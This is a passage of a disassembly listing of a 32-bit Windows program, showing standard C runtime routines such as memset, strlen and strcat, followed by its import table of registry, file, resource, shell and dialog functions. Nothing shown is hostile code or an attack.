loc_40BD09: ; CODE XREF: sub_40BC54+97�j
; sub_40BC54+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40BC54 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_40BB9E
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40BD30 proc near ; CODE XREF: sub_40BA13+EF�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_40BD83
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_40BD77
neg ecx
and ecx, 3
jz short loc_40BD59
sub edx, ecx
loc_40BD53: ; CODE XREF: sub_40BD30+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_40BD53
loc_40BD59: ; CODE XREF: sub_40BD30+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_40BD77
rep stosd
test edx, edx
jz short loc_40BD7D
loc_40BD77: ; CODE XREF: sub_40BD30+18�j
; sub_40BD30+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_40BD77
loc_40BD7D: ; CODE XREF: sub_40BD30+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_40BD83: ; CODE XREF: sub_40BD30+A�j
mov eax, [esp+arg_0]
retn
sub_40BD30 endp
; ---------------------------------------------------------------------------
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40BD96 proc near ; CODE XREF: sub_408980+21D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40BDBD
push esi
call sub_40BF40
inc eax
push eax ; dwBytes
call sub_40AE50
pop ecx
test eax, eax
pop ecx
jz short loc_40BDBD
push esi
push eax
call sub_40BE50
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_40BDBD: ; CODE XREF: sub_40BD96+7�j
; sub_40BD96+1A�j
xor eax, eax
pop esi
retn
sub_40BD96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BDC1 proc near ; CODE XREF: sub_40BE1D+1D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_C], 0
mov ecx, [ebp+arg_4]
push ebx
push esi
push edi
jz short loc_40BDDB
mov esi, [ebp+arg_0]
mov byte ptr [ecx], 2Dh
inc ecx
neg esi
jmp short loc_40BDDE
; ---------------------------------------------------------------------------
loc_40BDDB: ; CODE XREF: sub_40BDC1+D�j
mov esi, [ebp+arg_0]
loc_40BDDE: ; CODE XREF: sub_40BDC1+18�j
mov edi, ecx
loc_40BDE0: ; CODE XREF: sub_40BDC1+43�j
mov eax, esi
xor edx, edx
div [ebp+arg_8]
mov eax, esi
mov ebx, edx
xor edx, edx
div [ebp+arg_8]
cmp ebx, 9
mov esi, eax
jbe short loc_40BDFC
add bl, 57h
jmp short loc_40BDFF
; ---------------------------------------------------------------------------
loc_40BDFC: ; CODE XREF: sub_40BDC1+34�j
add bl, 30h
loc_40BDFF: ; CODE XREF: sub_40BDC1+39�j
mov [ecx], bl
inc ecx
test esi, esi
ja short loc_40BDE0
and byte ptr [ecx], 0
dec ecx
loc_40BE0A: ; CODE XREF: sub_40BDC1+55�j
mov dl, [edi]
mov al, [ecx]
mov [ecx], dl
mov [edi], al
dec ecx
inc edi
cmp edi, ecx
jb short loc_40BE0A
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40BDC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BE1D proc near ; CODE XREF: sub_409190+49�p
; sub_40A980+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_8], 0Ah
jnz short loc_40BE30
cmp [ebp+arg_0], eax
jge short loc_40BE30
push 1
pop eax
loc_40BE30: ; CODE XREF: sub_40BE1D+9�j
; sub_40BE1D+E�j
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BDC1
mov eax, [ebp+arg_4]
add esp, 10h
pop ebp
retn
sub_40BE1D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40BE50 proc near ; CODE XREF: sub_40BD96+1E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_0]
jmp short loc_40BEC1
; ---------------------------------------------------------------------------
align 10h
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_40BE7C
loc_40BE6D: ; CODE XREF: sub_40BE50+2A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_40BEAF
test ecx, 3
jnz short loc_40BE6D
loc_40BE7C: ; CODE XREF: sub_40BE50+1B�j
; sub_40BE50+42�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_40BE7C
mov eax, [ecx-4]
test al, al
jz short loc_40BEBE
test ah, ah
jz short loc_40BEB9
test eax, 0FF0000h
jz short loc_40BEB4
test eax, 0FF000000h
jz short loc_40BEAF
jmp short loc_40BE7C
; ---------------------------------------------------------------------------
loc_40BEAF: ; CODE XREF: sub_40BE50+22�j
; sub_40BE50+5B�j
lea edi, [ecx-1]
jmp short loc_40BEC1
; ---------------------------------------------------------------------------
loc_40BEB4: ; CODE XREF: sub_40BE50+54�j
lea edi, [ecx-2]
jmp short loc_40BEC1
; ---------------------------------------------------------------------------
loc_40BEB9: ; CODE XREF: sub_40BE50+4D�j
lea edi, [ecx-3]
jmp short loc_40BEC1
; ---------------------------------------------------------------------------
loc_40BEBE: ; CODE XREF: sub_40BE50+49�j
lea edi, [ecx-4]
loc_40BEC1: ; CODE XREF: sub_40BE50+5�j
; sub_40BE50+62�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_40BEE6
loc_40BECD: ; CODE XREF: sub_40BE50+8D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_40BF38
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_40BECD
jmp short loc_40BEE6
; ---------------------------------------------------------------------------
loc_40BEE1: ; CODE XREF: sub_40BE50+AE�j
; sub_40BE50+C8�j
mov [edi], edx
add edi, 4
loc_40BEE6: ; CODE XREF: sub_40BE50+7B�j
; sub_40BE50+8F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_40BEE1
test dl, dl
jz short loc_40BF38
test dh, dh
jz short loc_40BF2F
test edx, 0FF0000h
jz short loc_40BF22
test edx, 0FF000000h
jz short loc_40BF1A
jmp short loc_40BEE1
; ---------------------------------------------------------------------------
loc_40BF1A: ; CODE XREF: sub_40BE50+C6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_40BF22: ; CODE XREF: sub_40BE50+BE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_40BF2F: ; CODE XREF: sub_40BE50+B6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_40BF38: ; CODE XREF: sub_40BE50+82�j
; sub_40BE50+B2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_40BE50 endp
; =============== S U B R O U T I N E =======================================
sub_40BF40 proc near ; CODE XREF: sub_40BD96+A�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_40BF60
loc_40BF4C: ; CODE XREF: sub_40BF40+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_40BF93
test ecx, 3
jnz short loc_40BF4C
add eax, 0
loc_40BF60: ; CODE XREF: sub_40BF40+A�j
; sub_40BF40+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_40BF60
mov eax, [ecx-4]
test al, al
jz short loc_40BFB1
test ah, ah
jz short loc_40BFA7
test eax, 0FF0000h
jz short loc_40BF9D
test eax, 0FF000000h
jz short loc_40BF93
jmp short loc_40BF60
; ---------------------------------------------------------------------------
loc_40BF93: ; CODE XREF: sub_40BF40+11�j
; sub_40BF40+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40BF9D: ; CODE XREF: sub_40BF40+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40BFA7: ; CODE XREF: sub_40BF40+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40BFB1: ; CODE XREF: sub_40BF40+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_40BF40 endp
; ---------------------------------------------------------------------------
align 10h
push ebx
mov eax, [esp+14h]
or eax, eax
jnz short loc_40BFE1
mov ecx, [esp+10h]
mov eax, [esp+0Ch]
xor edx, edx
div ecx
mov eax, [esp+8]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_40C031
; ---------------------------------------------------------------------------
loc_40BFE1: ; CODE XREF: .text:0040BFC7�j
mov ecx, eax
mov ebx, [esp+10h]
mov edx, [esp+0Ch]
mov eax, [esp+8]
loc_40BFEF: ; CODE XREF: .text:0040BFF9�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_40BFEF
div ebx
mov ecx, eax
mul dword ptr [esp+14h]
xchg eax, ecx
mul dword ptr [esp+10h]
add edx, ecx
jb short loc_40C01A
cmp edx, [esp+0Ch]
ja short loc_40C01A
jb short loc_40C022
cmp eax, [esp+8]
jbe short loc_40C022
loc_40C01A: ; CODE XREF: .text:0040C00A�j
; .text:0040C010�j
sub eax, [esp+10h]
sbb edx, [esp+14h]
loc_40C022: ; CODE XREF: .text:0040C012�j
; .text:0040C018�j
sub eax, [esp+8]
sbb edx, [esp+0Ch]
neg edx
neg eax
sbb edx, 0
loc_40C031: ; CODE XREF: .text:0040BFDF�j
pop ebx
retn 10h
; ---------------------------------------------------------------------------
align 200h
_text ends
; Section 2. (virtual address 0000D000)
; Virtual size : 0000130C ( 4876.)
; Section size in file : 00001400 ( 5120.)
; Offset to raw data for section: 0000B600
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from ADVAPI32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; LSTATUS __stdcall RegDeleteValueA(HKEY hKey,LPCSTR lpValueName)
extrn RegDeleteValueA:dword ; CODE XREF: sub_402370+768�p
; DATA XREF: sub_402370+768�r
; LSTATUS __stdcall RegEnumKeyExA(HKEY hKey,DWORD dwIndex,LPSTR lpName,LPDWORD lpcchName,LPDWORD lpReserved,LPSTR lpClass,LPDWORD lpcchClass,PFILETIME lpftLastWriteTime)
extrn RegEnumKeyExA:dword ; CODE XREF: sub_402370+2A1�p
; sub_402370+2D9�p ...
; LSTATUS __stdcall RegCloseKey(HKEY hKey)
extrn RegCloseKey:dword ; CODE XREF: sub_402DC0+C�p
; sub_402DE0+55�p ...
; LSTATUS __stdcall RegCreateKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD Reserved,LPSTR lpClass,DWORD dwOptions,REGSAM samDesired,const LPSECURITY_ATTRIBUTES lpSecurityAttributes,PHKEY phkResult,LPDWORD lpdwDisposition)
extrn RegCreateKeyExA:dword ; CODE XREF: sub_402DE0+36�p
; sub_4039C0+7D3�p ...
; LSTATUS __stdcall RegOpenKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD ulOptions,REGSAM samDesired,PHKEY phkResult)
extrn RegOpenKeyExA:dword ; CODE XREF: sub_402E50+22�p
; sub_402EA0+35�p ...
; LSTATUS __stdcall RegSetValueExA(HKEY hKey,LPCSTR lpValueName,DWORD Reserved,DWORD dwType,const BYTE *lpData,DWORD cbData)
extrn RegSetValueExA:dword ; CODE XREF: sub_402FF0:loc_403361�p
; sub_4039C0+806�p ...
; LSTATUS __stdcall RegQueryInfoKeyA(HKEY hKey,LPSTR lpClass,LPDWORD lpcchClass,LPDWORD lpReserved,LPDWORD lpcSubKeys,LPDWORD lpcbMaxSubKeyLen,LPDWORD lpcbMaxClassLen,LPDWORD lpcValues,LPDWORD lpcbMaxValueNameLen,LPDWORD lpcbMaxValueLen,LPDWORD lpcbSecurityDescriptor,PFILETIME lpftLastWriteTime)
extrn RegQueryInfoKeyA:dword ; CODE XREF: sub_403400+27�p
; sub_403450+34�p
; DATA XREF: ...
; LSTATUS __stdcall RegEnumValueA(HKEY hKey,DWORD dwIndex,LPSTR lpValueName,LPDWORD lpcchValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData)
extrn RegEnumValueA:dword ; CODE XREF: sub_403450+70�p
; DATA XREF: sub_403450+70�r
; LSTATUS __stdcall RegQueryValueExA(HKEY hKey,LPCSTR lpValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData)
extrn RegQueryValueExA:dword ; CODE XREF: sub_4036E0+13D�p
; sub_4036E0+15C�p ...
; LSTATUS __stdcall RegDeleteKeyA(HKEY hKey,LPCSTR lpSubKey)
extrn RegDeleteKeyA:dword ; CODE XREF: sub_402370+2EC�p
; sub_402370+9BA�p ...
;
; Imports from KERNEL32.dll
;
; int __stdcall lstrcmpiA(LPCSTR lpString1,LPCSTR lpString2)
extrn lstrcmpiA:dword ; CODE XREF: sub_4010C0+15F�p
; sub_4010C0+16B�p ...
; DWORD __stdcall GetCurrentThreadId()
extrn GetCurrentThreadId:dword ; CODE XREF: sub_4010C0:loc_4011D8�p
; sub_404DC0+6�p ...
; LPVOID __stdcall HeapAlloc(HANDLE hHeap,DWORD dwFlags,SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: sub_4010C0+E4�p
; sub_40AE50+18�p ...
; void __stdcall GetSystemInfo(LPSYSTEM_INFO lpSystemInfo)
extrn GetSystemInfo:dword ; CODE XREF: sub_4010C0+A4�p
; DATA XREF: sub_4010C0+A4�r
; HANDLE __stdcall HeapCreate(DWORD flOptions,SIZE_T dwInitialSize,SIZE_T dwMaximumSize)
extrn HeapCreate:dword ; CODE XREF: sub_4010C0+99�p
; sub_4010C0+F4�p
; DATA XREF: ...
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: sub_4010C0+C�p
; sub_4010C0:loc_401442�p ...
; int __stdcall MultiByteToWideChar(UINT CodePage,DWORD dwFlags,LPCSTR lpMultiByteStr,int cbMultiByte,LPWSTR lpWideCharStr,int cchWideChar)
extrn MultiByteToWideChar:dword ; CODE XREF: sub_401560+1E�p
; sub_402FF0+229�p ...
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_401710+177�p
; sub_4018A0+174�p ...
; DWORD __stdcall SizeofResource(HMODULE hModule,HRSRC hResInfo)
extrn SizeofResource:dword ; CODE XREF: sub_401710+12F�p
; sub_4018A0+12C�p
; DATA XREF: ...
; HGLOBAL __stdcall LoadResource(HMODULE hModule,HRSRC hResInfo)
extrn LoadResource:dword ; CODE XREF: sub_401710+103�p
; sub_4018A0+100�p
; DATA XREF: ...
; HRSRC __stdcall FindResourceA(HMODULE hModule,LPCSTR lpName,LPCSTR lpType)
extrn FindResourceA:dword ; CODE XREF: sub_401710+E5�p
; sub_4018A0+E2�p
; DATA XREF: ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_401710+B3�p
; sub_401710+B9�p ...
; HMODULE __stdcall LoadLibraryExA(LPCSTR lpLibFileName,HANDLE hFile,DWORD dwFlags)
extrn LoadLibraryExA:dword ; CODE XREF: sub_401710+9E�p
; sub_4018A0+98�p
; DATA XREF: ...
; int __stdcall WideCharToMultiByte(UINT CodePage,DWORD dwFlags,LPCWSTR lpWideCharStr,int cchWideChar,LPSTR lpMultiByteStr,int cbMultiByte,LPCSTR lpDefaultChar,LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte:dword ; CODE XREF: sub_401710+3E�p
; sub_401710+8E�p ...
; LPSTR __stdcall lstrcpynA(LPSTR lpString1,LPCSTR lpString2,int iMaxLength)
extrn lstrcpynA:dword ; CODE XREF: sub_401A30+AD�p
; sub_402370+8B8�p ...
; BOOL __stdcall IsDBCSLeadByte(BYTE TestChar)
extrn IsDBCSLeadByte:dword ; CODE XREF: sub_401D60+36�p
; sub_401DC0+7A�p
; DATA XREF: ...
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
extrn DeleteFileA:dword ; CODE XREF: sub_4036E0+20D�p
; sub_40B540+4�p
; DATA XREF: ...
; BOOL __stdcall CopyFileA(LPCSTR lpExistingFileName,LPCSTR lpNewFileName,BOOL bFailIfExists)
extrn CopyFileA:dword ; CODE XREF: sub_4039C0+57B�p
; DATA XREF: sub_4039C0+57B�r
; int __stdcall lstrcmpA(LPCSTR lpString1,LPCSTR lpString2)
extrn lstrcmpA:dword ; CODE XREF: sub_4039C0+555�p
; sub_405500+2D�p ...
; BOOL __stdcall SetFileAttributesA(LPCSTR lpFileName,DWORD dwFileAttributes)
extrn SetFileAttributesA:dword ; CODE XREF: sub_4039C0+483�p
; DATA XREF: sub_4039C0+483�r
; DWORD __stdcall GetFileAttributesA(LPCSTR lpFileName)
extrn GetFileAttributesA:dword ; CODE XREF: sub_4039C0+442�p
; sub_4039C0+46B�p
; DATA XREF: ...
; void __stdcall InitializeCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn InitializeCriticalSection:dword ; CODE XREF: sub_4045A0+3B�p
; sub_4045A0+41�p ...
; BOOL __stdcall HeapDestroy(HANDLE hHeap)
extrn HeapDestroy:dword ; CODE XREF: sub_404720+A9�p
; sub_404720+B7�p
; DATA XREF: ...
; void __stdcall DeleteCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn DeleteCriticalSection:dword ; CODE XREF: sub_404720+55�p
; sub_404720+5B�p ...
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule,LPCH lpFilename,DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: sub_4010C0+1AB�p
; sub_4010C0+286�p ...
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_404A70+14D�p
; sub_409520+15�p ...
; LPSTR __stdcall lstrcpyA(LPSTR lpString1,LPCSTR lpString2)
extrn lstrcpyA:dword ; CODE XREF: sub_404C30+10D�p
; sub_408E00+46�p ...
; LPSTR __stdcall lstrcatA(LPSTR lpString1,LPCSTR lpString2)
extrn lstrcatA:dword ; CODE XREF: sub_404C30+75�p
; sub_409BD0+2D�p ...
; void __stdcall LeaveCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn LeaveCriticalSection:dword ; CODE XREF: sub_404DC0+2D�p
; DialogFunc+4D�p
; DATA XREF: ...
; void __stdcall EnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn EnterCriticalSection:dword ; CODE XREF: sub_404DC0+14�p
; DialogFunc+A�p
; DATA XREF: ...
; BOOL __stdcall FlushInstructionCache(HANDLE hProcess,LPCVOID lpBaseAddress,SIZE_T dwSize)
extrn FlushInstructionCache:dword ; CODE XREF: DialogFunc+83�p
; DATA XREF: DialogFunc+83�r
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: DialogFunc+7C�p
; sub_40AFB0+10�p
; DATA XREF: ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: start+98�p
; DATA XREF: start+98�r
; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo)
extrn GetStartupInfoA:dword ; CODE XREF: start+73�p
; DATA XREF: start+73�r
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: start+19�p start+A5�p ...
; LPVOID __stdcall HeapReAlloc(HANDLE hHeap,DWORD dwFlags,LPVOID lpMem,SIZE_T dwBytes)
extrn HeapReAlloc:dword ; CODE XREF: sub_40AEB0+2F�p
; sub_40AEB0+48�p
; DATA XREF: ...
; BOOL __stdcall HeapFree(HANDLE hHeap,DWORD dwFlags,LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: sub_40AF10+17�p
; sub_40AF10+2B�p
; DATA XREF: ...
; BOOL __stdcall GetStringTypeW(DWORD dwInfoType,LPCWSTR lpSrcStr,int cchSrc,LPWORD lpCharType)
extrn GetStringTypeW:dword ; CODE XREF: sub_40BA13+3F�p
; sub_40BA13+12D�p
; DATA XREF: ...
; BOOL __stdcall GetStringTypeA(LCID Locale,DWORD dwInfoType,LPCSTR lpSrcStr,int cchSrc,LPWORD lpCharType)
extrn GetStringTypeA:dword ; CODE XREF: sub_40BA13+59�p
; sub_40BA13+8D�p
; DATA XREF: ...
; int __stdcall LCMapStringW(LCID Locale,DWORD dwMapFlags,LPCWSTR lpSrcStr,int cchSrc,LPWSTR lpDestStr,int cchDest)
extrn LCMapStringW:dword ; CODE XREF: sub_40B7C4+42�p
; sub_40B7C4+14D�p ...
; int __stdcall LCMapStringA(LCID Locale,DWORD dwMapFlags,LPCSTR lpSrcStr,int cchSrc,LPSTR lpDestStr,int cchDest)
extrn LCMapStringA:dword ; CODE XREF: sub_40B7C4+5E�p
; sub_40B7C4+A7�p
; DATA XREF: ...
; void __stdcall GetSystemTimeAsFileTime(LPFILETIME lpSystemTimeAsFileTime)
extrn GetSystemTimeAsFileTime:dword ; CODE XREF: sub_40B4C8+A�p
; sub_40B50B+A�p
; DATA XREF: ...
; BOOL __stdcall CreateDirectoryA(LPCSTR lpPathName,LPSECURITY_ATTRIBUTES lpSecurityAttributes)
extrn CreateDirectoryA:dword ; CODE XREF: sub_40B16E+6�p
; DATA XREF: sub_40B16E+6�r
; BOOL __stdcall TerminateProcess(HANDLE hProcess,UINT uExitCode)
extrn TerminateProcess:dword ; CODE XREF: sub_40AFB0+17�p
; DATA XREF: sub_40AFB0+17�r
; DWORD __stdcall GetShortPathNameA(LPCSTR lpszLongPath,LPSTR lpszShortPath,DWORD cchBuffer)
extrn GetShortPathNameA:dword ; CODE XREF: sub_4010C0+1C4�p
; sub_4010C0+29F�p
; DATA XREF: ...
; int __stdcall lstrlenA(LPCSTR lpString)
extrn lstrlenA:dword ; CODE XREF: sub_4010C0+1DF�p
; sub_4010C0+2BA�p ...
; int __stdcall lstrlenW(LPCWSTR lpString)
extrn lstrlenW:dword ; CODE XREF: sub_4010C0+209�p
; sub_4010C0+2E4�p ...
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: sub_4010C0+475�p
; sub_409CE0+2A�p ...
; HANDLE __stdcall CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes,BOOL bManualReset,BOOL bInitialState,LPCSTR lpName)
extrn CreateEventA:dword ; CODE XREF: sub_401060+C�p
; DATA XREF: sub_401060+C�r
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes,SIZE_T dwStackSize,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,DWORD dwCreationFlags,LPDWORD lpThreadId)
extrn CreateThread:dword ; CODE XREF: sub_401060+32�p
; DATA XREF: sub_401060+32�r
extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind�r
; DWORD __stdcall WaitForSingleObject(HANDLE hHandle,DWORD dwMilliseconds)
extrn WaitForSingleObject:dword ; CODE XREF: sub_401000+16�p
; sub_401000+2A�p
; DATA XREF: ...
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_401000+44�p
; DATA XREF: sub_401000+44�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule,LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_404A70+15F�p
; sub_409520+32�p ...
;
; Imports from OLEAUT32.dll
;
; HRESULT __stdcall LoadTypeLib(LPCOLESTR szFile,ITypeLib **pptlib)
extrn LoadTypeLib:dword ; CODE XREF: sub_404C30+C9�p
; sub_404C30+15B�p
; DATA XREF: ...
; UINT __stdcall SysStringLen(BSTR)
extrn SysStringLen:dword ; CODE XREF: sub_403920+12�p
; sub_4039C0+37B�p ...
; BSTR __stdcall SysAllocStringLen(const OLECHAR *strIn,UINT ui)
extrn SysAllocStringLen:dword ; CODE XREF: sub_403920+27�p
; sub_404320+118�p ...
; void __stdcall SysFreeString(BSTR bstrString)
extrn SysFreeString:dword ; CODE XREF: sub_4036E0+3B�p
; sub_403920+81�p ...
; BSTR __stdcall SysAllocString(const OLECHAR *psz)
extrn SysAllocString:dword ; CODE XREF: sub_4036E0+52�p
; sub_4036E0+93�p ...
; HRESULT __stdcall VarUI4FromStr(LPCOLESTR strIn,LCID lcid,ULONG dwFlags,ULONG *pulOut)
extrn VarUI4FromStr:dword ; CODE XREF: sub_402FF0+238�p
; DATA XREF: sub_402FF0+238�r
; HRESULT __stdcall RegisterTypeLib(ITypeLib *ptlib,LPCOLESTR szFullPath,LPCOLESTR szHelpDir)
extrn RegisterTypeLib:dword ; CODE XREF: sub_404810+1E6�p
; DATA XREF: sub_404810+1E6�r
;
; Imports from SHELL32.dll
;
; HINSTANCE __stdcall ShellExecuteA(HWND hwnd,LPCSTR lpOperation,LPCSTR lpFile,LPCSTR lpParameters,LPCSTR lpDirectory,INT nShowCmd)
extrn ShellExecuteA:dword ; CODE XREF: sub_404FF0+12�p
; DATA XREF: sub_404FF0+12�r
; void __stdcall SHChangeNotify(LONG wEventId,UINT uFlags,LPCVOID dwItem1,LPCVOID dwItem2)
extrn SHChangeNotify:dword ; CODE XREF: sub_4039C0+890�p
; DATA XREF: sub_4039C0+890�r
;
; Imports from USER32.dll
;
; UINT __stdcall GetDlgItemTextA(HWND hDlg,int nIDDlgItem,LPSTR lpString,int cchMax)
extrn GetDlgItemTextA:dword ; CODE XREF: sub_406E00+16�p
; DATA XREF: sub_406E00+16�r
; BOOL __stdcall SetDlgItemTextA(HWND hDlg,int nIDDlgItem,LPCSTR lpString)
extrn SetDlgItemTextA:dword ; CODE XREF: sub_405680+B1�p
; sub_4057A0+17�p
; DATA XREF: ...
; int wsprintfA(LPSTR,LPCSTR,...)
extrn wsprintfA:dword ; CODE XREF: sub_4055A0+3D�p
; sub_4055A0+60�p ...
; LRESULT __stdcall SendDlgItemMessageA(HWND hDlg,int nIDDlgItem,UINT Msg,WPARAM wParam,LPARAM lParam)
extrn SendDlgItemMessageA:dword ; CODE XREF: sub_405500+4F�p
; sub_405500+63�p ...
; int __stdcall wvsprintfA(LPSTR,LPCSTR,va_list arglist)
extrn wvsprintfA:dword ; CODE XREF: sub_4051A0+CE�p
; sub_4055A0+80�p ...
; BOOL __stdcall KillTimer(HWND hWnd,UINT_PTR uIDEvent)
extrn KillTimer:dword ; CODE XREF: sub_406720+38�p
; sub_406720+4E0�p
; DATA XREF: ...
; void __stdcall PostQuitMessage(int nExitCode)
extrn PostQuitMessage:dword ; CODE XREF: sub_405180+C�p
; sub_406D00+3B�p
; DATA XREF: ...
; HWND __stdcall GetDlgItem(HWND hDlg,int nIDDlgItem)
extrn GetDlgItem:dword ; CODE XREF: sub_404FC0+9�p
; sub_405C90+750�p ...
; BOOL __stdcall PostMessageA(HWND hWnd,UINT Msg,WPARAM wParam,LPARAM lParam)
extrn PostMessageA:dword ; CODE XREF: sub_404FC0+26�p
; DATA XREF: sub_404FC0+26�r
; BOOL __stdcall EnableWindow(HWND hWnd,BOOL bEnable)
extrn EnableWindow:dword ; CODE XREF: sub_405C90+755�p
; sub_405C90+769�p ...
; HWND __stdcall CreateDialogParamA(HINSTANCE hInstance,LPCSTR lpTemplateName,HWND hWndParent,DLGPROC lpDialogFunc,LPARAM dwInitParam)
extrn CreateDialogParamA:dword ; CODE XREF: sub_404DC0+4A�p
; DATA XREF: sub_404DC0+4A�r
; int __stdcall LoadStringA(HINSTANCE hInstance,UINT uID,LPSTR lpBuffer,int cchBufferMax)
extrn LoadStringA:dword ; CODE XREF: sub_4036E0+2F�p
; sub_4039C0+7A�p ...
; UINT_PTR __stdcall SetTimer(HWND hWnd,UINT_PTR nIDEvent,UINT uElapse,TIMERPROC lpTimerFunc)
extrn SetTimer:dword ; CODE XREF: sub_4064E0+70�p
; sub_406720+354�p ...
; BOOL __stdcall SetWindowTextA(HWND hWnd,LPCSTR lpString)
extrn SetWindowTextA:dword ; CODE XREF: sub_405C90+3CF�p
; DATA XREF: sub_405C90+3CF�r
; int __stdcall MessageBoxA(HWND hWnd,LPCSTR lpText,LPCSTR lpCaption,UINT uType)
extrn MessageBoxA:dword ; CODE XREF: sub_4051A0+16E�p
; DATA XREF: sub_4051A0+16E�r
